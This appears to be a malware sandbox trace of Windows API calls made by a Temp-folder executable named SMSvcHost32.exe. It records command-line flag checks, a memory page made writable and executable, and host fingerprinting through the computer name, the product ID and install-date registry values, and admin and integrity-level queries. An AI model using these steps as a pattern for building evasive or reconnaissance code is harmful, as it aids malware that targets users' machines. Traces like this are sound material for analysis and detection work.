	[0088.558] StrCmpIW (psz1="S-1-5-18", psz2="S-1-5-21-2172869166-1497266965-2109836178-1000") returned -1
	[0088.559] LocalFree (hMem=0x4fbba8) returned 0x0
	[0088.560] CloseHandle (hObject=0x1d0) returned 1
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] GetLastError () returned 0x0
	[0088.560] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch="--reinstall") returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch=" --service") returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.561] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch="-test") returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.562] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] StrStrIW (lpFirst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpSrch=" --vwxyz") returned=" --vwxyz"
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] VirtualProtect (in: lpAddress=0x432e20, dwSize=0x184, flNewProtect=0x40, lpflOldProtect=0x20afdbc | out: lpflOldProtect=0x20afdbc*=0x4) returned 1
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.563] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.564] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.565] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.566] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.567] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetLastError () returned 0x0
	[0088.568] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0088.568] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0088.569] GetVersion () returned 0x23f00206
	[0088.569] GetCurrentProcessId () returned 0xdd4
	[0088.569] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.569] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualQuery") returned 0x765b7a90
	[0088.569] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.569] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0088.569] GetNativeSystemInfo (in: lpSystemInfo=0x20afcd0 | out: lpSystemInfo=0x20afcd0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0088.569] GetComputerNameW (in: lpBuffer=0x4fd760, nSize=0x20afd40 | out: lpBuffer="X2VS1CUM", nSize=0x20afd40) returned 1
	[0088.570] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x20afd14 | out: phkResult=0x20afd14*=0x1d0) returned 0x0
	[0088.570] RegQueryValueExA (in: hKey=0x1d0, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x504568, lpcbData=0x20afd18*=0xc8 | out: lpType=0x0, lpData=0x504568*=0xa4, lpcbData=0x20afd18*=0xa4) returned 0x0
	[0088.570] RegQueryValueExA (in: hKey=0x1d0, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x20afd08, lpcbData=0x20afd18*=0x4 | out: lpType=0x0, lpData=0x20afd08*=0x3f, lpcbData=0x20afd18*=0x4) returned 0x0
	[0088.570] RegCloseKey (hKey=0x1d0) returned 0x0
	[0088.570] lstrlenA (lpString="00342-50487-12048-AAOEM") returned 23
	[0088.570] GetComputerNameA (in: lpBuffer=0x4fff80, nSize=0x20afd18 | out: lpBuffer="X2VS1CUM", nSize=0x20afd18) returned 1
	[0088.570] lstrlenA (lpString="X2VS1CUM") returned 8
	[0088.570] IsUserAnAdmin () returned 0
	[0088.570] CreateWellKnownSid (in: WellKnownSidType=0x27, DomainSid=0x0, pSid=0x20afd08, cbSid=0x20afd14 | out: pSid=0x20afd08*(Revision=0x0, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x81, [1]=0x59, [2]=0x20, [3]=0x74, [4]=0x7a, [5]=0x4d), SubAuthority=([0]=0x50, [1]=0xfd, [2]=0xa, [3]=0x2, [4]=0xc)), cbSid=0x20afd14) returned 0
	[0088.570] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20afca0 | out: TokenHandle=0x20afca0*=0x1d8) returned 1
	[0088.570] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20afca8 | out: TokenInformation=0x0, ReturnLength=0x20afca8) returned 0
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.570] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetTokenInformation (in: TokenHandle=0x1d8, TokenInformationClass=0x19, TokenInformation=0x4f7a20, TokenInformationLength=0x14, ReturnLength=0x20afca8 | out: TokenInformation=0x4f7a20, ReturnLength=0x20afca8) returned 1
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetLastError () returned 0x7a
	[0088.571] GetSidSubAuthorityCount (pSid=0x4f7a28*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x4f7a29
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetSidSubAuthority (pSid=0x4f7a28*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x4f7a30
	[0088.572] CloseHandle (hObject=0x1d8) returned 1
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.572] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
	[0088.573] GetLastError () returned 0x0
